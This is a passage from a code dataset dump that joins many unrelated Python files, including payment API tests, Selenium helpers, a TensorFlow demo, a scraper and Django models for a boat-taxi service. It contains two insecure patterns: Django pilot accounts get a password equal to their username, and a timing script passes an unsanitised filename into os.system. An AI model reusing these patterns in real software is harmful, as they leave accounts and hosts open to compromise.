payment_securecard(cardreference=sc_response.CARDREFERENCE)\n response = wn.xml(TERM_ID).payment(p)\n assert_that(response, instance_of(PAYMENTRESPONSE))\n assert_that(response.RESPONSECODE, equal_to('A'))\n\n\ndef test_paysafe_keyed_payment_ok():\n request = payment_avs().is_multicurrency(True)\n request.AUTOREADY = 'C'\n\n response = wn.xml(TERM_ID).payment(request)\n assert_that(response, instance_of(PAYMENTRESPONSE))\n assert_that(response.RESPONSECODE, equal_to('A'))\n\n\ndef test_paysafe_partial_refund():\n p = payment_avs()\n p.AUTOREADY = 'C'\n payment_response = wn.xml(TERM_ID).payment(p)\n assert_that(payment_response, instance_of(PAYMENTRESPONSE))\n assert_that(payment_response.RESPONSECODE, equal_to('A'))\n\n uniqueref = payment_response.UNIQUEREF\n amount = round(p.AMOUNT / 2)\n refund_response = wn.xml(TERM_ID).refund(uniqueref, amount)\n assert_that(refund_response, instance_of(REFUNDRESPONSE))\n assert_that(refund_response.RESPONSECODE, equal_to('A'))\n\n\ndef test_paysafe_full_refund():\n p = payment_avs()\n p.AUTOREADY = 'C'\n payment_response = wn.xml(TERM_ID).payment(p)\n assert_that(payment_response, instance_of(PAYMENTRESPONSE))\n assert_that(payment_response.RESPONSECODE, equal_to('A'))\n\n uniqueref = payment_response.UNIQUEREF\n refund_response = wn.xml(TERM_ID).refund(uniqueref, p.AMOUNT)\n assert_that(refund_response, instance_of(REFUNDRESPONSE))\n assert_that(refund_response.RESPONSECODE, equal_to('A'))\n","sub_path":"test/xml/exigo/test_paysafe_payment.py","file_name":"test_paysafe_payment.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"33373136","text":"from selenium import webdriver\nfrom selenium.webdriver.support.select import Select\nfrom selenium import webdriver as driver\nfrom selenium.webdriver.common.by import By\n\nbrowser = driver.Chrome(\"C:\\\\Browsers_Selenium\\\\Chrome\\\\ChromeDriver.exe\")\nbrowser.maximize_window()\nbrowser.get(\"http://www.amazon.in\")\n\n#Function for Select dropdown value by 
visible text\ndef select_dropdown_by_visible_text(element, select_text):\n    assert_element_is_dropdown(element)\n    all_options = element.find_elements_by_tag_name('option')\n    option_found = False\n    for option in all_options:\n        #all_options_dropdown_value = Select(all_options)\n        #option_text = all_options_dropdown_value.select_by_visible_text(select_text)\n        option_text = option.text\n        print(option_text)\n        if option_text == select_text:\n            #driver.implicitly_wait(10000)\n            option.click()\n            option_found = True\n            break\n\n    if not option_found:\n        raise ValueError('The requested value was not found in the dropdown')\n    return\n\n#Function for selecting a dropdown option by its value attribute\ndef select_dropdown_by_value(element, select_value):\n    assert_element_is_dropdown(element)\n    all_options = element.find_elements_by_tag_name('option')\n    option_found = False\n    for option in all_options:\n        option_text = option.get_attribute('value')\n        if option_text == select_value:\n            option.click()\n            option_found = True\n            break\n\n    if not option_found:\n        raise ValueError('The requested value was not found in the dropdown')\n    return\n\n#function for checking whether the element is a dropdown or not\ndef assert_element_is_dropdown(element):\n    if element.get_attribute('type') not in ['select-one', 'select-multiple']:\n        raise AssertionError('This is not a dropdown')\n    return\n\nmy_dropdown = browser.find_element_by_xpath(\"//*[@id='searchDropdownBox']\")\nprint(\"my_dropdown - \", my_dropdown)\n\n#select_dropdown_by_visible_text(my_dropdown,'Books')\nselect_dropdown_by_value(my_dropdown,'Baby')","sub_path":"Learning Script/dropdown.py","file_name":"dropdown.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"384233815","text":"casa= int(input('Qual o valor da casa? '))\nsalario= int(input('Qual o seu salario? '))\nanos= int(input('Em quantos anos voce quer pagar? 
'))\ndef emprestimo(casa,salario,anos):\n x=casa/(anos*12)\n if x<=0.3*salario:\n return('Empréstimo aprovado')\n else:\n return('Empréstimo não aprovado')\nprint(emprestimo(casa,salario,anos))","sub_path":"backup/user_036/ch26_2020_03_18_01_24_48_123205.py","file_name":"ch26_2020_03_18_01_24_48_123205.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"10582844","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 17 11:22:42 2017\n\n@author: rd0348\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\n\n# 用 Numpy 随机生成100个数据\nx_data = np.float32(np.random.rand(2,100))\ny_data = np.dot([0.100,0.200],x_data)+0.300\n\n# 构造一个线性模型\nb = tf.Variable(tf.zeros([1]))\nW = tf.Variable(tf.random_uniform([1,2],-1.0,1.0))\ny = tf.matmul(W,x_data)+b\n\n\n# 最小化方差\nloss = tf.reduce_mean(tf.square(y-y_data))\noptimizer = tf.train.GradientDescentOptimizer(0.5)\ntrain = optimizer.minimize(loss)\n\n# 初始化变量\ninit = tf.initialize_all_variables()\n\n# 启动图(graph)\nsess = tf.Session()\nsess.run(init)\n\n# 拟合平面\nfor step in range(0,201):\n sess.run(train)\n if step % 20 == 0:\n print(step,sess.run(W),sess.run(b))\n\nmatrix1 = tf.constant([[3.,3.]])\nmatrix2 = tf.constant([[2.],[2.]])\nproduct = tf.matmul(matrix1,matrix2)\nwith tf.Session() as sess:\n print(sess.run(product))\n\n","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"558082739","text":"#!/usr/bin/env python\n\nimport os, sys\nfrom optparse import OptionParser\n\nthis_dir = os.path.dirname(os.path.realpath(__file__))\n\ndef get_license_by_name(name):\n if name.lower() == 'bsd':\n return open(os.path.join(this_dir, 'licenses', 'bsd.txt'), 'r').read()\n elif name.lower() == 'mit':\n return open(os.path.join(this_dir, 'licenses', 'mit.txt'), 'r').read()\n elif name.lower() == 'gpl':\n return open(os.path.join(this_dir, 'licenses', 'gpl_v3.txt'), 'r').read()\n else:\n return \"REPLACE ME WITH A LICENSE\"\n\ndef comment_license(license, prefix=\" * \"):\n commented_license = \"\"\n for line in license.split('\\n'):\n commented_license += (prefix+line+'\\n')\n return commented_license\n\ndef get_module_path(module):\n return os.path.join(this_dir, 'modules', module)\n\ndef get_module_hooks(subs, module):\n hooks_dir = os.path.join(get_module_path(module), 'hooks')\n for root, dirs, files in os.walk(hooks_dir):\n for file_name in files:\n sub = file_name.split('.')[0]\n if sub in subs:\n subs[sub] += open(os.path.join(root, file_name), 'r').read()\n else:\n subs[sub] = open(os.path.join(root, file_name), 'r').read()\n return subs\n\ndef walk_module_template(module, output_dir, subs):\n template_dir = os.path.join(get_module_path(module), 'template')\n for root, dirs, files in os.walk(template_dir):\n rel_path = os.path.relpath(root, template_dir)\n if not os.path.exists(os.path.join(output_dir, rel_path.format(**subs))):\n os.makedirs(os.path.join(output_dir, rel_path.format(**subs)))\n for file_name in files:\n # Read the file contents\n file_contents = open(os.path.join(root, file_name), 'r').read()\n try:\n # Substitute the file name\n file_name_sub = file_name.format(**subs)\n subs['this_file'] = file_name_sub\n # Substitute the contents\n file_contents = file_contents.format(**subs)\n except KeyError as e:\n print(\"Missing key `{}` in file `{}`\".format(str(e), os.path.join(root, file_name)))\n return\n # Write 
the new contents to the desitnation\n open(os.path.join(output_dir, rel_path.format(**subs), file_name_sub), 'w+').write(file_contents)\n\ndef create_project(options, modules):\n # Create subs\n subs = {}\n subs['project_name'] = options.project_name.lower()\n project_name = options.project_name.lower()\n output_dir = os.path.join(options.output_dir, project_name)\n subs['project_name_camel'] = options.project_name\n subs['project_name_caps'] = project_name.upper()\n subs['author'] = options.author\n subs['email'] = options.email\n from datetime import date\n subs['year'] = str(date.today().year)\n subs['license_type'] = options.license\n subs['license'] = get_license_by_name(options.license)\n subs['license_commented'] = comment_license(subs['license'])\n subs['organization'] = options.organization\n subs['cmake_include_hook'] = ''\n subs['header_hook_1'] = ''\n subs['header_hook_2'] = ''\n subs['header_hook_3'] = ''\n subs['header_public_hook'] = ''\n subs['header_private_hook'] = ''\n subs['cmake_post_library_hook'] = ''\n\n for module in modules:\n subs = get_module_hooks(subs, module)\n\n # Recursively replace\n for key in subs.keys():\n try:\n subs[key] = subs[key].format(**subs)\n except KeyError as e:\n print('Unhandled key: {}'.format(str(e)))\n\n # If the directory does not exist, make it\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n # Walk the template base\n for root, dirs, files in os.walk(os.path.join(this_dir, 'base')):\n rel_path = os.path.relpath(root, os.path.join(this_dir, 'base'))\n if not os.path.exists(os.path.join(output_dir, rel_path.format(**subs))):\n os.makedirs(os.path.join(output_dir, rel_path.format(**subs)))\n for file_name in files:\n # Read the file contents\n file_contents = open(os.path.join(root, file_name), 'r').read()\n try:\n # Substitute the file name\n file_name_sub = file_name.format(**subs)\n subs['this_file'] = file_name_sub\n # Substitute the contents\n file_contents = file_contents.format(**subs)\n except KeyError as e:\n print(\"Missing key `{}` in file `{}`\".format(str(e), os.path.join(root, file_name)))\n return\n # Write the new contents to the desitnation\n open(os.path.join(output_dir, rel_path.format(**subs), file_name_sub), 'w+').write(file_contents)\n\n # Integrate module templates\n for module in modules:\n walk_module_template(module, output_dir, subs)\n\ndef main():\n parser = OptionParser()\n parser.add_option(\"-o\", \"--output-dir\", dest=\"output_dir\",\n help=\"Folder to write new project to\", metavar=\"OUTPUT_DIR\")\n parser.add_option(\"-p\", \"--project-name\", dest=\"project_name\",\n help=\"Name of the project, use camel case (e.g. 
SuperSensor4001 rather than supersensor4001 or SUPERSENSOR4001)\",\n metavar=\"PROJECT_NAME\")\n parser.add_option(\"-a\", \"--author\", dest=\"author\",\n help=\"Author's name\", metavar=\"AUTHOR\")\n parser.add_option(\"-e\", \"--email\", dest=\"email\",\n help=\"Author's email\", metavar=\"EMAIL\")\n parser.add_option(\"-l\", \"--license\", dest=\"license\", default=\"None\",\n help=\"License of the project: BSD, MIT, GPL, NONE [default: %default]\")\n parser.add_option(\"-g\", \"--organization\", dest=\"organization\",\n help=\"Organization\", metavar=\"ORGANIZATION\")\n (options, args) = parser.parse_args()\n if not options.output_dir:\n print(\"Ouput Directory required\")\n parser.print_help()\n return\n if not options.project_name:\n print(\"Project Name required\")\n parser.print_help()\n return\n if not options.author:\n print(\"Author Name required\")\n parser.print_help()\n return\n if not options.email:\n print(\"Author Email required\")\n parser.print_help()\n return\n if options.license.lower() not in ['bsd', 'mit', 'gpl', 'none']:\n print(\"Invalid license, must be on of BSD, MIT, GPL, NONE\")\n parser.print_help()\n return\n if not options.organization:\n print(\"Organization required\")\n parser.print_help()\n return\n create_project(options, modules=[])\n\nif __name__ == '__main__':\n main()\n","sub_path":"generate_project.py","file_name":"generate_project.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"563301028","text":"import sys\nimport time\nimport os\n\ndef read(fn):\n\twith open(fn) as f:\n\t\tdata = f.readlines()\n\treturn data\ndef write(fn, data):\n\tf = open(fn, \"w\")\n\tfor line in data:\n\t\tf.write(line)\n\tf.close()\n\treturn\ndef consoleOut(fn):\n\tcommand = \"IF EXIST \"+fn+\" ( rm \"+fn+\" )\"\n\tres = os.system(command)\n\tif(res != 0): print(\"PROCESS RETURNED \"+res)\n\treturn\ndef main():\n\tstart = time.time()\n\tfn = sys.argv[1]\n\tdestination = sys.argv[2]\n\ttestCount = int(sys.argv[3])\n\tdestroyAfter = int(sys.argv[4])\n\tprint(\"new file name: \", destination, end=\"\\n\")\n\tprint(\"Starting test, reading file \", fn, \" \", testCount, \" times\\n-----------------------\", end=\"\\n\")\n\tfor i in range(testCount):\n\t\tdata = read(fn)\n\t\twrite(destination, data)\n\t\tif(destroyAfter):\n\t\t\tconsoleOut(destination)\n\tend = time.time()\n\tprint(\"Time elapsed: \", (end-start))\n\treturn\n\nmain()\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"248579003","text":"# pylint:disable=wildcard-import\r\n# pylint:disable=unused-import\r\n# pylint:disable=unused-variable\r\n# pylint:disable=unused-argument\r\n# pylint:disable=redefined-outer-name\r\n\r\nfrom pathlib import Path\r\nfrom typing import Dict\r\n\r\nimport pytest\r\nfrom jsonschema import SchemaError, ValidationError\r\n\r\nfrom servicelib.jsonschema_specs import create_jsonschema_specs\r\nfrom servicelib.jsonschema_validation import validate_instance\r\nfrom simcore_service_webserver.projects.projects_fakes import Fake\r\n\r\n\r\n@pytest.fixture\r\ndef project_schema_file(api_specs_dir: Path) -> Path:\r\n return api_specs_dir / \"v0/components/schemas/project-v0.0.1.json\"\r\n\r\n@pytest.fixture\r\nasync def project_specs(loop, project_schema_file: Path) -> Dict:\r\n # should not raise any exception\r\n try:\r\n specs = await 
create_jsonschema_specs(project_schema_file)\r\n return specs\r\n except SchemaError:\r\n pytest.fail(\"validation of schema {} failed\".format(project_schema_file))\r\n\r\n\r\n@pytest.fixture\r\ndef fake_db():\r\n Fake.reset()\r\n Fake.load_template_projects()\r\n\r\nasync def test_validate_templates(loop, project_specs: Dict, fake_db):\r\n for pid, project in Fake.projects.items():\r\n try:\r\n validate_instance(project.data, project_specs)\r\n except ValidationError:\r\n pytest.fail(\"validation of project {} failed\".format(pid))\r\n\r\n","sub_path":"services/web/server/tests/unit/test_template_projects.py","file_name":"test_template_projects.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"634880858","text":"import unittest\nfrom abelfunctions.tests.test_abelfunctions import AbelfunctionsTestCase\n\nfrom abelfunctions import RiemannSurface\n\nclass TestConstruction(AbelfunctionsTestCase):\n\n def test_places(self):\n X = RiemannSurface(self.f1)\n places = X(-3)\n for bi in X.branch_points:\n places = X(bi)\n\n X = RiemannSurface(self.f2)\n places = X(-3)\n for bi in X.branch_points:\n places = X(bi)\n","sub_path":"abelfunctions/tests/test_riemann_surface.py","file_name":"test_riemann_surface.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"540225266","text":"import os\nimport logging\nimport logging.handlers\n\n\ndef getLogger(name):\n logger = logging.Logger(name)\n\n handler = logging.handlers.RotatingFileHandler(\n os.path.join('/app/rapse/log/', name + '.log'),\n mode='a',\n maxBytes=5 * 1024 * 1024,\n backupCount=10,\n )\n\n handler.setLevel(logging.INFO)\n handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\n logger.addHandler(handler)\n return logger\n\n\ndef split_list(list, size):\n for i in range(0, len(list), size):\n yield list[i:i + size]\n","sub_path":"app/util/generals.py","file_name":"generals.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"103668624","text":"import json\nimport requests \nimport random\nimport discord\n\nclient = discord.Client()\n\nchallenges = []\nwith open('Functionalities\\challenges.json') as json_file:\n data = json.load(json_file)\n for c in data['challenges']:\n challenges.append(c)\n temp = data['challenges']\n\n#adds new challenge to the challenge list\ndef write_json(data, filename='Functionalities\\challenges.json'):\n with open(filename,'w') as f:\n json.dump(data,f,indent=4)\n\n#this function gets you a challenge from the list of challenges and returns it as a string to be sent through chat.\ndef get_challenge():\n response = requests.get(f\"https://www.codewars.com/api/v1/code-challenges/{random.choice(challenges)}\")\n json_data = json.loads(response.text)\n challenge = json_data['name']+ '\\n' + 'Languages: ' +str(json_data['languages']) + '\\n' + json_data['url']\n return challenge\n\n#this function adds a new challenge to the challenges list\ndef new_challenge(challenge_url):\n challenge_id = challenge_url.split('/')[-3]\n if challenge_id not in challenges:\n temp.append(challenge_id)\n write_json(data)\n return f'Se añadio https://www.codewars.com/kata/{challenge_id} a la lista!'\n else:\n return 'El reto ya existe en nuestra base de datos!' 
\ndef get_challenge_list(): # NOTE: hypothetical name - the original def line is missing from this snippet
\n\n#this function return our current challenge list\n x = []\n for i in range(len(challenges)):\n response = requests.get(f\"https://www.codewars.com/api/v1/code-challenges/{challenges[i]}\")\n json_data = json.loads(response.text)\n challenge = json_data['url']\n x.append(challenge)\n return x","sub_path":"Functionalities/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"415233695","text":"# Author: Kene Udeh\n# Title: The Easiest Problem Is This One\n# Question: https://open.kattis.com/problems/easiest\n# Run: python easiest.py < \"input files/easiest.in\"\nimport sys\nfrom functools import reduce\n\ndef easiest():\n\n str_num = sys.stdin.readline()[:-1]\n num = int(str_num)\n\n while num != 0:\n\n digit_sum = reduce((lambda x, y: x + y), list(map(lambda x: int(x), list(str_num))))\n new_num = 11\n same_sum = reduce((lambda x, y: x + y), list(map(lambda x: int(x), list(str(num * new_num)))))\n\n while True:\n if same_sum == digit_sum:\n break\n new_num += 1\n mult = num * new_num\n same_sum = reduce(lambda x, y: x + y, list(map(lambda x: int(x), list(str(mult)))))\n\n\n print(new_num)\n str_num = sys.stdin.readline()[:-1]\n num = int(str_num)\n\nif __name__ == '__main__':\n easiest()\n","sub_path":"kattis-problems/easiest.py","file_name":"easiest.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375523405","text":"\"\"\"\nУзнайте у пользователя число n. Найдите сумму чисел n + nn + nnn. Например, пользователь ввёл число 3.\nСчитаем 3 + 33 + 333 = 369.\n\"\"\"\nnumber = input('Input an integer number: ')\n\nwhile True:\n if number.isdigit():\n number_1 = int(number)\n break\n else:\n print(\"Input only integer numbers\")\n number = input('Input a number: ')\n\nnumber_2, number_3 = number * 2, number * 3\n\nprint(f\"{number_1} + {number_2} + {number_3} = {int(number_1) + int(number_2) + int(number_3)}\")\n\n","sub_path":"lesson_1/task_1_3.py","file_name":"task_1_3.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"413431696","text":"# coding=utf-8\nimport json\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport os\n\nfrom bs4 import BeautifulSoup\nimport urllib, urllib.request, urllib.error\nfrom retry import retry\nimport time\n\nKOREAN_DRAMAS_TOP = \"https://filmarks.com/list-drama/country/147\"\nDRAMA_DETAIL = \"https://filmarks.com/dramas/{}/{}\"\n\ndriver = webdriver.Remote(\n command_executor='http://selenium-hub:4444/wd/hub',\n desired_capabilities=DesiredCapabilities.CHROME)\n\n@retry(ValueError,tries=10, delay=10)\ndef get_reviews(drama_series_id, drama_season_id, page=1):\n time.sleep(2)\n print(\"Get Reviews: page=\", page)\n\n driver.get(DRAMA_DETAIL.format(drama_series_id, drama_season_id) + \"?page={}\".format(page))\n time.sleep(2.0)\n soup = BeautifulSoup(driver.page_source.encode('utf-8'), features=\"html.parser\")\n reviews_container = soup.find(class_=\"p-main-area\")\n review_elems = reviews_container.find_all(class_=\"p-mark__review\")\n reviews = [review_elem.get_text() for review_elem in review_elems]\n\n next_elem = reviews_container.find(class_=\"c-pagination__next\")\n\n if next_elem and \"is-hidden\" not in next_elem.get(\"class\"):\n 
reviews.extend(get_reviews(drama_series_id, drama_season_id, page + 1)) # 次のページの内容を追加\n\n return reviews\n\n\ndef get_detail(drama_series_id, drama_season_id):\n print(\"Get Detail:\", drama_series_id, drama_season_id)\n\n driver.get(DRAMA_DETAIL.format(drama_series_id, drama_season_id))\n time.sleep(1.0)\n soup = BeautifulSoup(driver.page_source.encode('utf-8'), features=\"html.parser\")\n detail_body = soup.find(class_=\"p-content-detail__body\")\n\n # print(driver.find_element_by_class_name())\n # Title\n title = detail_body.find(class_=\"p-content-detail__title\").find(\"span\", recursive=False).get_text()\n print(\"Title=\", title)\n\n # Detail\n detail = None\n details = detail_body.find_all(class_=\"p-content-detail__synopsis-desc\")\n\n if details and len(details):\n detail = details[-1].get_text() # [0]は,「続きを読む」クリック前の短いもの\n print(\"Detail=\", detail)\n\n # Thumbnail\n thumbnail = detail_body.find(class_=\"c-content__jacket\").find(\"img\").get(\"src\")\n print(\"Thumbnail=\", thumbnail)\n\n # Stars\n stars = detail_body.find(class_=\"c-rating__score\").get_text()\n print(\"Starts=\", stars)\n\n # Year\n title_elem = detail_body.find(class_=\"p-content-detail__title\")\n if title_elem and title_elem.find(\"a\"):\n year = title_elem.find(\"a\").get_text()\n print(\"Year=\", year)\n\n # Casts\n casts = None\n cast_elem = detail_body.find(class_=\"p-content-detail__people-list-casts\")\n if cast_elem:\n cast_elements = cast_elem.find_all(\"a\")\n casts = [cast_element.get_text() for cast_element in cast_elements]\n print(\"Casts=\", casts)\n\n # Movies\n vod = detail_body.find(class_=\"p-content-detail-related-info-content__vod\")\n\n amazon_prime = \"\"\n netflix = \"\"\n if vod:\n movie_elements = detail_body.find(class_=\"p-content-detail-related-info-content__vod\").find_all(\"a\")\n movies = [movie_element.get(\"href\") for movie_element in movie_elements]\n for movie in movies:\n if \"amazon\" in movie: # Amazon Prime\n amazon_prime = movie\n\n elif \"netflix\" in movie: # Netflix\n netflix = movie\n\n print(\"Amazon Prime=\", amazon_prime)\n print(\"Netflix=\", netflix)\n\n # Reviews\n reviews = get_reviews(drama_series_id, drama_season_id)\n\n return {\n \"title\": title,\n \"detail\": detail,\n \"thumbnail\": thumbnail,\n \"stars\": stars,\n \"year\": year,\n \"casts\": casts,\n \"amazon_prime\": amazon_prime,\n \"netflix\": netflix,\n \"reviews\": reviews\n }\n\n\ndef get_page(url, page_number=0):\n old_url = url\n if page_number:\n url += \"?page={}\".format(page_number)\n\n\n\n print(\"Get Page:\", url)\n html = urllib.request.urlopen(url)\n soup = BeautifulSoup(html, features=\"html.parser\")\n\n dramas = soup.find(class_=\"p-movies-grid\").find_all(recursive=False)\n\n is_first = True\n for i, drama in enumerate(dramas):\n if is_first: # 最初の要素は違うやつなので無視\n is_first = False\n continue\n\n filename = \"{}.json\".format(i)\n if page_number:\n filename = str(page_number) + \"_\" + filename\n\n if os.path.exists(\"./results/{}\".format(filename)):\n continue\n\n drama_data = json.loads(drama.attrs[\"data-drama-season-clip\"])\n drama_series_id = drama_data[\"drama_series_id\"]\n drama_season_id = drama_data[\"drama_season_id\"]\n\n drama_data = get_detail(drama_series_id, drama_season_id)\n\n with open(\"./results/{}\".format(filename), mode=\"a\") as f:\n f.write(json.dumps(drama_data, ensure_ascii=False))\n\n if not page_number:\n page_number+=1\n get_page(old_url, page_number + 1)\n\n# 
韓国のドラマ一覧\nget_page(KOREAN_DRAMAS_TOP)\n\ndriver.close()\ndriver.quit()\n","sub_path":"script/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"271803509","text":"# -*- coding: utf-8 -*-\n# import datetime\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models import Max\nfrom django.core.validators import MinValueValidator\nimport datetime\nimport random\nfrom django.utils.text import slugify\n\n\nBARCO_CORES = (\n (\"#000\", \"Black\"),\n (\"#ec8800\", \"Orange\"),\n (\"#000080\", \"Navy\"),\n (\"#800080\", \"Purple\"),\n (\"#FF0000\", \"Red\"),\n (\"#2E8B57\", \"SeaGreen\"),\n (\"#00FF7F\", \"SpringGreen\"),\n (\"#FF6347\", \"Tomato\"),\n (\"#FFFF00\", \"Yellow\"),\n (\"#0000FF\", \"Blue\"),\n (\"#5F9EA0\", \"CadetBlue\"),\n)\n\n\nVIAGEM_STATUS = (\n (0, \"Inativa\"),\n (1, \"Passageiro desistiu\"),\n (3, \"Aguardando aceite\"),\n (4, \"Aguardando embarque\"),\n (5, \"Passageiro embarcado\"),\n (6, \"Viagem finalizada\"),\n)\n\ndef upload_banner(instance, filename):\n pk = instance.pk\n if not pk:\n id = Anuncio.objects.all().aggregate(Max('id'))\n pk = id['id__max'] + 1\n return u\"anuncio/banner/{0}/{1}\".format(pk, filename)\n\n\nclass Passageiro(models.Model):\n nome = models.CharField(max_length=255)\n senha = models.CharField(max_length=255, null=True, blank=True)\n email = models.CharField(max_length=500, null=True, blank=True)\n telefone = models.CharField(max_length=255, null=True, blank=True)\n ultimo_login = models.DateTimeField(null=True, blank=True)\n data_nascimento = models.DateField(null=True, blank=True)\n\n def viagens_realizadas(self):\n\n return self.viagem_set.filter(data_desembarque__isnull=False).count()\n\n def __unicode__(self):\n return self.nome\n\n def to_json(self):\n p = {}\n p[\"pk\"] = self.pk\n p[\"nome\"] = self.nome\n p[\"email\"] = self.email\n p[\"telefone\"] = self.telefone\n if self.data_nascimento:\n p[\"data_nascimento\"] = self.data_nascimento.isoformat()\n else:\n p[\"data_nascimento\"] = None\n\n return p\n\n\nclass Piloto(models.Model):\n nome = models.CharField(max_length=255)\n ativo = models.BooleanField(default=False)\n user = models.ForeignKey(User, verbose_name=u\"Usuário\", null=True, blank=True, on_delete=models.SET_NULL)\n\n def save(self, *args, **kwargs):\n\n if not self.user:\n user = User()\n user.username = slugify(self.nome)\n user.set_password(user.username)\n user.save()\n self.user = user\n else:\n self.user.is_active = self.ativo\n if self.user.username != slugify(self.nome):\n self.user.username = slugify(self.nome)\n self.user.save()\n\n super(Piloto, self).save(*args, **kwargs)\n\n\n def to_json(self):\n\n return {\n \"nome\": self.nome,\n \"pk\": self.pk,\n }\n\n def __unicode__(self):\n return self.nome\n\n\nclass Barco(models.Model):\n nome = models.CharField(max_length=255)\n ativo = models.BooleanField(default=False)\n numero_passageiros = models.PositiveIntegerField(default=12, validators=[MinValueValidator(1)],\n choices=[(n, n) for n in xrange(1, 30)])\n ultima_localizacao = models.CharField(max_length=255, null=True, blank=True, default=\"-23.002195, -43.310382\")\n cor = models.CharField(max_length=255, null=True, blank=True, choices=BARCO_CORES, default=\"#000\")\n\n ultimo_piloto = models.ForeignKey(Piloto, null=True, blank=True)\n\n def to_json(self):\n\n b = {\n \"nome\": self.nome,\n \"pk\": self.pk,\n 
\"lat\": None,\n \"lng\": None,\n \"cor\": self.cor,\n }\n\n if self.ultima_localizacao:\n b[\"lat\"] = float(self.ultima_localizacao.split(\", \")[0])\n b[\"lng\"] = float(self.ultima_localizacao.split(\", \")[1])\n\n return b\n\n def __unicode__(self):\n return self.nome\n\n\nclass Preco(models.Model):\n preco = models.DecimalField(verbose_name=u'Preço', max_digits=10, decimal_places=2)\n resumo_initinerario = models.TextField()\n ativo = models.BooleanField(default=True)\n\n class Meta:\n verbose_name = u'Preço'\n verbose_name_plural = u'Preços'\n ordering = ['preco']\n\n def __unicode__(self):\n return u\"R${0}\".format(str(self.preco).replace(\".\", \",\"))\n\n\nclass Anuncio(models.Model):\n descricao = models.CharField(max_length=255, help_text=u\"Nome do anunciante ( não será exibido no aplicativo )\",\n null=True, blank=False)\n banner = models.ImageField(upload_to=upload_banner, help_text=u\"Tamanho: 300 x 100\")\n link = models.URLField(null=True, blank=True, default=None)\n ativo = models.BooleanField(default=True)\n\n def to_json(self):\n if self.link == \"\":\n lk = None\n else:\n lk = self.link\n return {\n \"banner\": self.banner.url,\n \"link\": lk,\n }\n\n def __unicode__(self):\n return self.descricao\n\n class Meta:\n verbose_name = u\"Anúncio\"\n verbose_name_plural = u\"Anúncios\"\n\n\nclass PontosEmbarque(models.Model):\n nome = models.CharField(max_length=255)\n localizacao = models.CharField(max_length=200, verbose_name=u\"Localização\")\n ativo = models.BooleanField(default=True)\n\n def to_json(self):\n\n return {\"lat\": float(self.localizacao.split(\", \")[0]),\n \"lng\": float(self.localizacao.split(\", \")[1]),\n \"nome\": self.nome,\n \"pk\": self.pk\n }\n\n\n class Meta:\n verbose_name = \"Pontos de embarque/desembarque\"\n verbose_name = \"Pontos de embarque/desembarque\"\n\n def __unicode__(self):\n return self.nome\n\n\nclass Viagem(models.Model):\n\n data_chamada = models.DateTimeField(db_index=True)\n passageiro = models.ForeignKey(Passageiro)\n quantidade = models.PositiveIntegerField(default=1, validators=[MinValueValidator(1)],\n choices=[(n, n) for n in xrange(1, 30)])\n ponto_desembarque = models.ForeignKey(PontosEmbarque, null=True, blank=False, related_name='ponto_desembarque')\n ponto_embarque = models.ForeignKey(PontosEmbarque, null=True, blank=False, related_name='ponto_embarque')\n\n aceite_piloto = models.DateTimeField(db_index=True, null=True, blank=True)\n piloto = models.ForeignKey(Piloto, null=True, blank=True)\n barco = models.ForeignKey(Barco, null=True, blank=True)\n\n embarque = models.CharField(max_length=255)\n embarque_lat_long = models.CharField(max_length=255)\n\n data_embarque = models.DateTimeField(db_index=True, null=True, blank=True)\n\n desembarque = models.CharField(max_length=255)\n desembarque_lat_long = models.CharField(max_length=255)\n data_desembarque = models.DateTimeField(db_index=True, null=True, blank=True)\n\n preco = models.DecimalField(default=0, max_digits=10, decimal_places=2, null=True, blank=True)\n preco_model = models.ForeignKey(Preco, null=True, blank=True)\n cor = models.CharField(max_length=100, null=True, blank=True)\n nota_classificacao = models.IntegerField(default=-1)\n\n status = models.IntegerField(choices=VIAGEM_STATUS, default=3)\n\n def save(self, *args, **kwargs):\n\n if self.ponto_embarque:\n self.embarque = self.ponto_embarque.nome\n self.embarque_lat_long = self.ponto_embarque.localizacao\n\n if self.ponto_desembarque:\n self.desembarque = self.ponto_desembarque.nome\n 
